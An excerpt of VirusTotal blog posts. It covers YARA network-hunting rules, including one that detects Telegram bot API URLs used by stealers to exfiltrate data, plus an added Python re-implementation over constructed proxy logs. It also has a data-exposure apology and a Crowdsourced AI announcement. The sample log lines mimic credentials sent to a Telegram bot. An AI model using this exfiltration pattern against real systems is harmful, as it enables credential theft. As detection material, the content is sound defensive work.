In this case we can easily see how the new “.net” attribute is used in this rule. First we use “domain.raw” to specify our domain by comparing it to a given string (“telegram.com” in this example). Then we simply check if any new file downloaded from that domain looks suspicious by having five or more malicious antivirus verdicts. We will keep this rule running as a Livehunt, and will be notified through <b><a href="https://blog.virustotal.com/2023/06/actionable-threat-intel-ii-ioc-stream.html" target="_blank">IoC Stream</a></b> in case VirusTotal sees anything suspicious being downloaded from our domain.
</div>
<br>
<div class="interval_12">
Let’s see another example.
</div>
<div class="interval_12">
Now we are going to reuse one of the rules available in our <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">repository</a>, in this case to track Cobalt Strike’s infrastructure. The rule tracks IP addresses serving a well-known Cobalt Strike certificate, which we check with the “ip.https_certificate.thumbprint” condition. We could easily create similar rules for all kinds of suspicious infrastructure serving https certificates identified as malicious.
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> Cobalt_Strike_Default_SSL_Certificate<br/>
<mark class="dark-blue">{</mark><br/>
<mark class="blue">meta</mark>:<br/>
name = <mark class="red">"Default CobaltStrike self-signed SSL Certificate"</mark><br/>
description = <mark class="red">"Find IP addresses serving the default SSL certificate used out of the box by Cobalt Strike for C2 comms"</mark><br/>
reference = <mark class="red">"https://www.mandiant.com/resources/blog/defining-cobalt-strike-components"</mark><br/>
target_entity = <mark class="red">"IPs"</mark><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.ip.https_certificate.thumbprint == <mark class="red">"6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c"</mark><br/>
<mark class="dark-blue">}</mark>
</div>
<br>
<div class="interval_12">
For our final example we will create a rule from scratch.
</div>
<div class="interval_12">
In this case we are inspired by the <a href="https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125/detection" target="_blank">Zaraza</a> bot credential stealer, which exfiltrates <a href="https://telegram-bot-sdk.readme.io/reference/senddocument" target="_blank">stolen data</a> using Telegram channels, so we will use VirusTotal to hunt for fresh infrastructure (URLs) used in that way. Our rule checks for known patterns in the URLs of a given domain (“api.telegram.org”), then checks whether the last file seen communicating with them (“communicating_file”) looks suspicious (“analysis_stats.malicious” > 5) and carries a particular AV verdict (“steal” or “exfilt”), which we find by iterating over its “signatures”.
</div>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> telegram_bot_stealer <mark class="dark-blue">{</mark> <br/>
<mark class="blue">meta</mark>:<br/>
description = <mark class="red">"Detects Telegram channels that bots potentially use to exfiltrate data to."</mark> <br/>
category = <mark class="red">"MAL-infra"</mark> <br/>
malware = <mark class="red">"Stealer"</mark> <br/>
reference = <mark class="red">"https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer"</mark> <br/>
examples = <mark class="red">"https://www.virustotal.com/gui/file/2cb42e07dbdfb0227213c50af87b2594ce96889fe623dbd73d228e46572f0125/detection, https://www.virustotal.com/gui/url/f4abd85188b86df95c7f8571f8043d92ad033b6376a113fd0acd8714bd345798/detection"</mark> <br/>
creation_date = <mark class="red">"2023-07-06"</mark> <br/>
last_modified = <mark class="red">"2023-07-06"</mark> <br/>
target_entity = <mark class="red">"url"</mark> <br/><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"https://api.telegram.org/bot"</mark> <mark class="blue">and</mark><br/>
<mark class="green">(</mark><br/>
(<br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"/sendMessage?"</mark> <mark class="blue">and</mark><br/>
vt.net.url.query <mark class="blue">icontains</mark> <mark class="red">"text="</mark><br/>
) <mark class="blue">or</mark><br/>
vt.net.url.raw <mark class="blue">icontains</mark> <mark class="red">"/sendDocument?"</mark><br/>
<mark class="green">)</mark> <mark class="blue">and</mark><br/>
vt.net.url.query <mark class="blue">icontains</mark> <mark class="red">"chat_id="</mark> <mark class="blue">and</mark><br/>
vt.net.url.communicating_file.analysis_stats.malicious > <mark class="green">5</mark> <mark class="blue">and</mark><br/>
<mark class="blue">for any</mark> engine, signature <mark class="blue">in</mark> vt.net.url.communicating_file.signatures : <mark class="green">(</mark> <br/>
signature <mark class="blue">icontains</mark> <mark class="red">"steal"</mark> <mark class="blue">or</mark> signature <mark class="blue">icontains</mark> <mark class="red">"exfilt"</mark><br/>
<mark class="green">)</mark><br/>
<mark class="dark-blue">}</mark>
</div>
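As an added example (not part of the original post and not VirusTotal code), the URL conditions of the rule above re-implemented in Python so the same logic can be run offline over proxy logs, with the VT-derived file attributes passed in as plain values. The log lines, bot token and chat_id below are constructed placeholders.

```python
"""Offline re-implementation of the telegram_bot_stealer rule's conditions,
run over constructed proxy log lines (not real traffic)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log; fields: timestamp src_ip http_method url.
# The bot token and chat_id are placeholders, not real values.
SAMPLE_PROXY_LOG = """\
2023-07-06T10:01:02Z 10.0.0.15 POST https://api.telegram.org/bot1234567890:AAexamplePLACEHOLDERtoken/sendMessage?chat_id=111222333&text=user%3Aadmin%20pass%3Ahunter2
2023-07-06T10:01:05Z 10.0.0.15 POST https://api.telegram.org/bot1234567890:AAexamplePLACEHOLDERtoken/sendDocument?chat_id=111222333
2023-07-06T10:02:11Z 10.0.0.22 GET https://api.telegram.org/bot1234567890:AAexamplePLACEHOLDERtoken/getUpdates?offset=5
2023-07-06T10:03:40Z 10.0.0.31 GET https://telegram.org/faq
2023-07-06T10:04:12Z 10.0.0.15 POST https://api.telegram.org/bot1234567890:AAexamplePLACEHOLDERtoken/sendMessage?text=hello
"""

_BOT_ID_RE = re.compile(r"/bot(\d+):")


def url_pattern_matches(url: str) -> bool:
    """Mirror the URL part of the rule's condition.

    YARA's `icontains` is a case-insensitive substring test, so the raw URL and
    the query string are lower-cased before each check.
    """
    raw = url.lower()
    query = urlsplit(url).query.lower()
    if "https://api.telegram.org/bot" not in raw:
        return False
    send_message = "/sendmessage?" in raw and "text=" in query
    send_document = "/senddocument?" in raw
    return (send_message or send_document) and "chat_id=" in query


def rule_matches(url: str, malicious: int, signatures: dict[str, str]) -> bool:
    """Full condition: URL pattern plus the communicating file's attributes.

    `malicious` stands in for communicating_file.analysis_stats.malicious and
    `signatures` for the engine -> verdict map the rule loops over.
    """
    if not url_pattern_matches(url):
        return False
    if not malicious > 5:
        return False
    return any("steal" in v.lower() or "exfilt" in v.lower() for v in signatures.values())


@dataclass(frozen=True)
class TelegramBotHit:
    src_ip: str
    api_method: str  # e.g. "sendMessage" or "sendDocument"
    chat_id: str
    bot_id: str      # numeric prefix of the token only; the secret part is never kept


def extract_hit(src_ip: str, url: str) -> TelegramBotHit | None:
    """Return a redacted record for a matching URL, or None if it does not match."""
    if not url_pattern_matches(url):
        return None
    parts = urlsplit(url)
    api_method = parts.path.rsplit("/", 1)[-1]
    chat_id = parse_qs(parts.query).get("chat_id", [""])[0]
    m = _BOT_ID_RE.search(parts.path)
    bot_id = m.group(1) if m else "unknown"
    return TelegramBotHit(src_ip, api_method, chat_id, bot_id)


def scan_proxy_log(lines: Iterable[str]) -> list[TelegramBotHit]:
    """Parse space-separated proxy log lines and collect matching requests."""
    hits: list[TelegramBotHit] = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:  # skip blank or malformed lines
            continue
        _ts, src_ip, _http_method, url = fields
        hit = extract_hit(src_ip, url)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(hit)
```

Of the five constructed lines only the sendMessage request carrying both chat_id and text, and the sendDocument request carrying chat_id, match, exactly as the YARA condition would decide.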
<br/>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
YARA rules are no longer limited only to tracking files. The new “.net” attribute in the “vt” YARA module empowers users with the ability to discover suspicious network infrastructure and combine it with VirusTotal’s metadata for a huge range of use cases.
</div>
<div class="interval_12">
The YARA “vt” module provides standardized syntax for <b>files</b> and <b>network</b> detection rules and allows combining attributes of different entities for highly customized monitoring rules. Additionally, it removes the need for periodic lookups (manual or, especially, automated) by allowing Livehunt rules to be deployed for monitoring.
</div>
<div class="interval_12">
Although this blog post shows some of the new YARA Netloc capabilities using a few examples, there are infinite possibilities. You can use it to track threat actors’ infrastructure, to monitor your own infrastructure (including IP ranges) or to detect phishing campaigns targeting your company, amongst many other use cases. You can find many more ideas by checking the YARA editor templates, checking the official <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">documentation</a> or the YARA rules <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">GitHub repository</a>.
</div>
<div class="interval_12">
We will be back soon with more details, use cases and examples for YARA Netloc hunting capabilities, but in the meantime do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a> for anything you need.
</div>
<div class="interval_12">
Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-52536031898978690192023-07-21T01:09:00.000+02:002023-07-21T01:09:10.686+02:00 Apology and Update on Recent Accidental Data Exposure<span id="docs-internal-guid-4fe28641-7fff-ea63-090d-c13bff1eecd6"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; white-space-collapse: preserve;">We are writing to share information about the recent customer data exposure incident on VirusTotal. We apologize for any concern or confusion this may have caused.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">On June 29, an employee accidentally uploaded a CSV file to the VirusTotal platform. This CSV file contained limited information of our Premium account customers, specifically the names of companies, the associated VirusTotal group names, and the email addresses of group administrators. We removed the file, which was only accessible to partners and corporate clients, from our platform within one hour of its posting.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">First and foremost, we want to clarify unequivocally: This was not the result of a cyber-attack or a vulnerability with VirusTotal. This was a human error, and there were no bad actors involved. 
</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This is an example of the data that was included in the CSV file:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 468pt;"><colgroup><col></col><col></col><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Company Name</span></p></td><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">VT Group</span></p></td><td style="background-color: #d9d9d9; border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid 
#000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Admin group email address</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">VirusTotal S.L.</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">virustotal</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; 
margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-style: italic; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">User@virustotal.com</span></p></td></tr></tbody></table></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">We assure you that the data disclosed was limited strictly to the sort of information provided in the example above. Since this incident, we have implemented new internal processes and technical controls to improve the security and safeguarding of customer data. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Trust is the bedrock of our community, and again we apologize for any confusion or concern this may have caused. 
</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">If you have additional questions or would like to speak with our support team, please reach out to </span><a href="mailto:contact@virustotal.com" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">contact@virustotal.com</span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Thank you,</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif;"><span style="font-size: 14.6667px; white-space-collapse: preserve;">The VirusTotal Team.</span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif;"><span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;"><b><u>Additional Q&A</u></b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Is my account at risk for hacking because of this incident?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">No, the list only included company names, VirusTotal group tenant names and VirusTotal group administrator emails. The Premium VirusTotal platform is only accessible to partners and corporate clients.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: How did VirusTotal become aware of the file's existence?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This was quickly flagged by our partners and fellow analysts via our support system—we removed the file within an hour of its posting. 
We deeply appreciate their timely action.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: How did these partners and analysts notice this particular file?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Many of our customers have a</span><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space-collapse: preserve;"> </span><a href="https://support.virustotal.com/hc/en-us/articles/360001315437-Livehunt" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">Livehunt </span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">service based on </span><a href="https://support.virustotal.com/hc/en-us/articles/115002178945-YARA" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; 
text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">YARA</span></a><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> rules. This service helps them identify targeted attacks against their organizations, such as phishing. Some of these YARA rules search for files containing their own domains. In this instance, the file matched these rules and the system generated an alert. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Could a malicious entity or anonymous user have downloaded the file from the VirusTotal platform?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">No. The file was only accessible to our partners and cybersecurity analysts who hold a Premium account with VirusTotal. No anonymous or free account users on VirusTotal had access to the Premium platform. 
</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Why are files uploaded and scanned on VirusTotal accessible to partners and professional security analysts via the VirusTotal Premium platform?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">The VirusTotal Premium platform facilitates the discovery of new cyber attacks by industry professionals and cybersecurity experts. This shared knowledge enables the analysis of new security threats, leading to updates in security products and an overall improvement in both corporate and worldwide security.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><b>Q: Why was an employee able to download the list in the first place? Has VirusTotal taken any measures as a result of this incident?</b></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">This list of limited customer data was critical to their role. 
Since this incident, we have implemented new internal processes and technical controls to improve the security and safeguarding of customer data. </span></p><div><span style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><br /></span></div></span>Emiliano Martinezhttp://www.blogger.com/profile/00741559542946939395noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-56242561664832313852023-07-18T15:32:00.002+02:002023-07-18T17:22:24.821+02:00VirusTotal += Crowdsourced AI<p>We are pleased to announce the launch of Crowdsourced AI, a new initiative from VirusTotal, dedicated to leveraging the power of AI in tandem with community contributions. Spearheading this endeavor, <a href="https://www.hispasec.com/en/" style="color: #1155cc; text-decoration: none;">Hispasec</a> brings to the table an AI solution designed to analyze Microsoft document formats, particularly those containing macros, such as Word, Excel, and PowerPoint files. We extend a warm invitation to all interested parties to join this effort and explore innovative ways to contribute features that will strengthen the cybersecurity community.</p>
<p>About three months ago, we rolled out <a href="https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html" style="color: #1155cc; text-decoration: none;">Code Insight</a>, an AI tool geared to help security analysts better understand unfamiliar code snippets with explanations in natural language. In a more recent <a href="https://blog.virustotal.com/2023/05/vt-code-insight-updates-and-q-on.html" style="color: #1155cc; text-decoration: none;">Q&A</a>, we put out a call to anyone keen to lend their own AI models or use cases to VirusTotal to benefit the community. Now, Hispasec has stepped in and added a powerful solution for Microsoft Office documents. They're using a different AI model not only to explain the macros but also to deliver judgements about any potential malicious content, boosting VirusTotal capabilities.</p>
<p>In the words of the company:<br>
<i>“We are incorporating a specialized AI component from our Content Disarm & Reconstruction (CDR) solution, DeepClean, into VirusTotal. This component leverages a Large Language Model (LLM) to interpret and explain the code within macros in specific Microsoft document formats. Additionally, it offers a verdict—based on the model's criteria—on whether the analyzed content can be considered malicious or benign. It’s important to emphasize that this is just one facet of DeepClean. Our broader solution recreates files into clean versions, eliminating executable code while preserving the essential content.”</i></p>
<p>This new integration not only bolsters our AI-driven security analysis but also exemplifies the strength in diversity, mirroring our existing initiatives like Crowdsourced IDS, Sigma, and YARA rules. In line with VirusTotal's mission, we openly welcome various complementary solutions, reaffirming our commitment to a collaborative defense strategy against cyber threats.</p>
<p>Let's dive into a few examples showcasing how this new crowdsourced AI section and the contributions from Hispasec perform and are displayed within VirusTotal.</p>
<p>In the example below, we see the verdict label "malicious" at the beginning of the explanation, emphasized in red for easy visibility. This is followed by a detailed description of how macros within this .XLS file employ various obfuscation techniques. These include base64 encoded strings and the concatenation of variables with diverse names, in an attempt to disguise their behavior. However, the model deobfuscates these measures, revealing the true intent of the macros. It turns out they are attempting to download a script containing a PowerShell reverse shell and subsequently execute it.</p>
<center>
<div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1076" data-original-width="1875" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXtuPegFf2Roo6wyEg9Qa88B81SH9VnTyL6okBxCtNfl7IbB1lf0AcWLFlTpE979GweU_SkW7uRW5KxpfAuz50qNNj2kP6JEn94040JVAP1glDz0RZ9J24XNzBSdtOQbwqYvR0HCZ98jJgyEJyJGhsjf3qASKnDXn6jeQSSN69t0b-8DNzNMT827r01k/s1600/Crowdsourced-AI-6.png"/></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e</span></span></a></p></center>
<p>In this other example, the model labels a file as "benign", with the verdict distinctly emphasized in green at the start of the detailed explanation. The report delves into the functionality of the various macros found within the file and their objectives.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1076" data-original-width="1860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd3K315kwlJqsRea85pvszEC-L2TnPPRJ5uzePED6diRQFJnsEiLYLRpsYv4ssXWpZoZIp7BpU8ncam0vXxz3tcPieWQOhkUNBlzcQrYQv9R5kAu7ydBjgf2rfm88WwlRywQauvE0w1L_ZLIRzigjfZ3vfifeES_nx6ah7g3Nn8A8myDW6mrDRm7Jit_Y/s1600/crowdsourced_ai_2.png"/></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28</span></span></a></p></center>
<b>Search with Crowdsourced AI results</b><br>
<p>All the data generated by contributors in Crowdsourced AI is indexed and readily accessible via VirusTotal Intelligence. This means that analysts can now utilize this resource to perform targeted searches, streamlining their investigative processes. For a focused search by verdict, simply input "crowdsourced_ai_verdict:" followed by either "malicious" or "benign". If you're looking to search within the explanations provided by the AI, use the "crowdsourced_ai_analysis:" parameter followed by the specific text you're interested in.</p>
